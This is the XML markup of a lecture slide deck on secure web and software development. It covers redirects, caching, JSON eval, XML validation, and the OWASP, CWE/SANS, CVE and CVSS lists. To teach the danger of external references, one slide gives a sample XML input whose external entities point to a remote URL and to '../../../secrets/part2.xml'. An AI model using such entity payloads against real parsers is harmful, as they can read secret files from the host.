            <a:endParaRPr b="0"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b applications frequently redirect and forward users to other pages and websi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n’t use unvalidated untrusted data to determine destination pag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lutions (per OWASP):</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="914400" indent="-51444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ply avoid using redirects and forwards.</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used, don’t involve user parameters in calculating the destination. This can usually be done.</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destination parameters can’t be avoided, ensure that the supplied value is valid, and authorized for the user. It is recommended that any such destination parameters be a mapping value, rather than the actual URL or portion of the URL, and that server side code translate this mapping to the target URL</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lications can use OWASP ESAPI to override the sendRedirect() method to make sure all redirect destinations are safe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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E76FD-9657-4972-B608-78DD64E626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ble caching </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>correctly</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> for sensitive data</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b browsers normally cache web pages to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atly reduces future latenc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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> cache sensitive data – enables many attack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sable sensitive data caching using HTTP 1.1 (1999)</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che-Control: no-stor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mon mistake = Using non-standard appro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standard cache disabling mechanisms only disable caches on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> browsers, &amp; few test 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ndustry-wide Misunderstandings of HTTPS” (June 2013) found that  70% of tested financial, healthcare, insurance and utility account sites did it wrong (“Only IE6 exis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general, try to use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>standard</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> mechanisms for security</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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B143-7E65-4943-9755-4E7776AEAC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n’t send comments to user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n’t send comments inside material to users unless you’re sure it’s okay to view</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times provide system insight, aiding attacke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stem design shouldn’t depend on secrecy, but why send info only of use to attacker?</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imarily an issue with web applicat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ents in HTML/XML/CSS snippets may be used to generate cod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kay to comment code; be careful sending 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ut comments in separate place or strip out</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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54EE-DCFF-480E-A87E-953E263573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JAX &amp; JSON</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="44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JAX = “Asynchronous JavaScript and XML”</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on set of technologies/technique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ten uses JSON = JavaScript Object Notatio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data serialization, original spec RFC 4627</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SON examp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Name": "Davi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astName": "Wheele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ddress":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treetAddress": "1600 Pennsylvania Av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ity": "Washingt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tate": "DC",</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E2BB-3461-4E7D-9DF4-ED59E0B50E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SON: Don’t just “eval”</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted data!</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st JSON-formatted text also syntactically legal JavaScript cod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Easy” way to parse JSON-formatted data in JavaScript is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>eva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n’t support some Unicode characte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urity vulnerability if data &amp; Javascript environment not controlled by single trusted sourc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malicious Javascript attack, application forgery, etc.</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general, don’t “eval” untrusted dat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st approach: use newer function JSON.pars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alibri"/>
              </a:rPr>
              <a:t>Mozilla Firefox 3.5+, MS IE 8+, Opera 10.5+, Google Chrome, Safari</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xt-best (old browsers): Check input </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> - picky whitelist</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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1BDA-E132-43EE-9AB7-1FBA1FF345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XML: Check formatting</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ts of data/messages formatted using XM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ell-formed”: Follows certain syntax rul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all opened tags are closed, nesting o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 before using from untrusted sourc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Valid”: Meets some schema definit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 for validity before using untrusted input</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iminates many problems – schema == whitelist</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n’t let </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> determine what schema to us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ide what schema is okay &amp; use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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385E-80C2-48C3-9C20-C1F26A4617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XML: External References</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n’t accept unchecked external references from untrusted sour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are URLs (absolute or relativ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bid or check (with whitelist) external reference </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> us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s:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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t;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>"&g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t;!DOCTYPE letter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lt;!ENTITY part1 SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>http://www.example.com/part1.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>"&g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lt;!ENTITY part2 SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>../../../secrets/part2.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>"&g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t;building&g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mp;part1; &amp;part2;</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t;/building&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00000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E785-3293-4C6E-A434-DCE9F86F49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b applications are client/server</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 browser is a client, web server is a ser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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> trust each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particular, server needs to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> blindly trust what client s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vascript on client is gre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er must NOT trust validation by untrusted cli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s, we’ve said this before </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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DFF0-33D1-4E85-8D0C-3D1588D85C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weakness lists &amp; taxonomies</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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C853-FEBF-4ECC-9877-277A405A53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of some common top weakness lists &amp; taxonomies</a:t>
            </a:r>
            <a:endParaRPr b="0"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t organizations have developed “top” weaknesses (types of flaws that can lead to a vulnerabilit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Identify some specific “things to look for firs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ulnerability lists may merge problems that can’t happen (or are less important) in a particular environment – or be specific to a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> environment (web vs. embedde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st “top” list is the one for your project &amp; organizati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do </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> need to memorize items in list or CWE numbe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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> need to know, for a given name, what it is (if we’ve covered i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xonomies try to give broader overviews/organization of weakness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organized by attack (how to attack i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organized by flaws (defect which may result in security violation)</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ll review a few “top” weakness lists &amp; taxonomi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lp reinforce what we’ve already learne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nt you to know of some common ones (name recogniti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ven’t covered some yet (crypto) – we will!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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E14D-2D6D-4505-9BC9-E902849BD7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Vulnerabilities and Exposures (CVE)</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VE = “dictionary of publicly known information security vulnerabilities and exposur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ulnerability = a specific mistake in some specific software directly usable by an attacker to gain access to system/network (not just any mistak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posure = a specific system configuration issue or mistake in software that allows access to information or capabilities that can be used as a stepping-st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VE-2013-1380 = Specific Adobe Flash Player vulnerabil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mon naming system – know if discussing same thin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organizations report vulnerabilit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VE IDs let you cross-reference their report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ore info: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://cve.mitre.org</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://nvd.nist.gov/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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3BA56-76A1-43C4-933B-3F63A9B39D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Vulnerability Scoring System (CVSS) version 2.0</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ndard scoring system for a vulnerability (0..10, 10=riskies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al: Simplify prioritizing them for remed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 metric group - intrinsic characteristic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ss Vector (AV): Local, adjacent network, net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ss Complexity (AC): High, medium, low</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entication (Au): Multiple, single, non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fidentiality Impact (C): None, partial, comple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ity Impact (I): None, partial, comple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ailability Impact (A): None, partial, complet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mporal (optional) - characteristics that change over tim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loitability (E); Remediation Level (RL); Report Confidence (RC) </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vironmental (optional) - characteristics relevant to particular environmen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ateral Damage Potential (CDP); Target Distribution (TD); Security Requirements (CR, IR, AR)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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E857D-C81C-4207-AD06-85F0523E86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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="592128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omplete Guide to the Common Vulnerability Scoring System Version 2.0” </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.first.org/cvss/cvss-guide.ht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VSS version 2 calculator” </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://nvd.nist.gov/cvss.cfm?calculator&amp;version=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Weakness Enumeration (CWE)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="44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mon Weakness Enumeration (CWE) = list of software weakness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akness =  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> of vulnerabilit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WE-120 = Buffer Copy without Checking Size of Input (“Classic Buffer Overflow”)</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ain, common naming system</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ful as “common nam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es have some structuring/organization (slices, graphs, parents/children)… but that’s not its strength</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info: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://cwe.mitre.org</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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3064-CC05-4E8E-8F0F-CF98D63D71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ndle full/unresponsive outpu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r system may clog/be unresponsive</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G., web browser halted, slow TCP/IP respons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n’t let your system hang due to unresponsive user!</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lease locks quickly, preferably before reply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 time-outs on network-oriented write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asure from start of your attempt – ok to halt in the middle</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n’t create an easy opportunity for a Denial-of-Service attack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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97D4-E7E6-43F5-A26B-282E42CAFB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WASP Top 10 (2013)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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B814-70E8-4F0B-9E4D-14F67A27C3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39" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609480" y="1371600"/>
          <a:ext cx="8153640" cy="4618080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4114800"/>
                <a:gridCol w="403884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urity Ris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vered in class session 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1: Inj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 out (SQL injection, shell inj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2: Broken Authentication and Sess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ent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3: Cross-Site Scripting (X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4: Insecure Direct Object Refe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least privilege), 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5: Security Misconfigu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6: Sensitive Data Expos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least privilege), Cryptograph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7: Missing Function Level Access Contr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least privile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8: Cross-Site Request Forgery (CSR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9: Using Components with Known Vulnerabil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solete code (8), Call out, Desig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10: Unvalidated Redirects and Forward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WE/SANS Top 25 Most Dangerous Software Errors (2011)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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A0CDC-E094-4A92-8A0C-36A5C2DD99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42" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304920" y="1523880"/>
          <a:ext cx="8610480" cy="4226040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="533160"/>
                <a:gridCol w="838440"/>
                <a:gridCol w="7238880"/>
              </a:tblGrid>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ank</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D</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1"/>
                        </a:rPr>
                        <a:t>CWE-89</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roper Neutralization of Special Elements used in an SQL Command ('SQL Inject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191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2"/>
                        </a:rPr>
                        <a:t>CWE-78</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roper Neutralization of Special Elements used in an OS Command ('OS Command Inject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3"/>
                        </a:rPr>
                        <a:t>CWE-120</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ffer Copy without Checking Size of Input ('Classic Buffer Overflow')</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4"/>
                        </a:rPr>
                        <a:t>CWE-79</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roper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</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5"/>
                        </a:rPr>
                        <a:t>CWE-306</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ssing Authentication for Critical Funct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6"/>
                        </a:rPr>
                        <a:t>CWE-86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ssing Authorizat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7"/>
                        </a:rPr>
                        <a:t>CWE-798</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of Hard-coded Credentials</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8"/>
                        </a:rPr>
                        <a:t>CWE-311</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ssing Encryption of Sensitive Data</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9"/>
                        </a:rPr>
                        <a:t>CWE-434</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restricted Upload of File with Dangerous Typ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0]</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10"/>
                        </a:rPr>
                        <a:t>CWE-807</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liance on Untrusted Inputs in a Security Decis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011 CWE/SANS Top 25 Most Dangerous Software Errors</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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AE0D-2E34-46BF-AC65-58AF6CBE29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45" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304920" y="1523880"/>
          <a:ext cx="8610480" cy="4079880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="533160"/>
                <a:gridCol w="838440"/>
                <a:gridCol w="7238880"/>
              </a:tblGrid>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ank</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D</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1"/>
                        </a:rPr>
                        <a:t>CWE-250</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ecution with Unnecessary Privileges</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2"/>
                        </a:rPr>
                        <a:t>CWE-35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oss-Site Request Forgery (CSRF)</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3]</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3"/>
                        </a:rPr>
                        <a:t>CWE-2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roper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</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4]</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4"/>
                        </a:rPr>
                        <a:t>CWE-494</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wnload of Code Without Integrity Check</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5"/>
                        </a:rPr>
                        <a:t>CWE-863</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correct Authorizat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6"/>
                        </a:rPr>
                        <a:t>CWE-829</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clusion of Functionality from Untrusted Control Spher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7]</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7"/>
                        </a:rPr>
                        <a:t>CWE-73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correct Permission Assignment for Critical Resourc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8]</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8"/>
                        </a:rPr>
                        <a:t>CWE-676</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of Potentially Dangerous Function</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9"/>
                        </a:rPr>
                        <a:t>CWE-327</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of a Broken or Risky Cryptographic Algorithm</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10"/>
                        </a:rPr>
                        <a:t>CWE-131</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correct Calculation of Buffer Siz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011 CWE/SANS Top 25 Most Dangerous Software Errors</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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EE15-F6AE-4E49-9FE2-D2E7336326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48" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304920" y="1523880"/>
          <a:ext cx="8610480" cy="2225880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="533160"/>
                <a:gridCol w="838440"/>
                <a:gridCol w="7238880"/>
              </a:tblGrid>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ank</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D</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1]</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1"/>
                        </a:rPr>
                        <a:t>CWE-307</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roper Restriction of Excessive Authentication Attempts</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2]</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2"/>
                        </a:rPr>
                        <a:t>CWE-601</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L Redirection to Untrusted Site ('Open Redirect')</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3]</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3"/>
                        </a:rPr>
                        <a:t>CWE-134</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controlled Format String</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4"/>
                        </a:rPr>
                        <a:t>CWE-190</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ger Overflow or Wraparound</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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CWE-759</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5120" rIns="1512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of a One-Way Hash without a Salt</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" marL="15120" marR="15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10 Secure Coding Practices (CERT/SEI) (1)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="250" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152280" y="1600200"/>
          <a:ext cx="8839440" cy="4668840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2133720"/>
                <a:gridCol w="670572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act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 Validate input.</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lidate input from all untrusted data sources. Proper input validation can eliminate the vast majority of software </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                          <a:uFillTx/>
                          <a:latin typeface="Calibri"/>
                          <a:hlinkClick r:id="rId1"/>
                        </a:rPr>
                        <a:t>vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>. Be suspicious of most external data sources, including command line arguments, network interfaces, environmental variables, and user controlled files [Seacord 05].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 Heed compiler warnings.</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ile code using the highest warning level available for your compiler and eliminate warnings by modifying the code [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                          <a:uFillTx/>
                          <a:latin typeface="Calibri"/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>C MSC00-A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
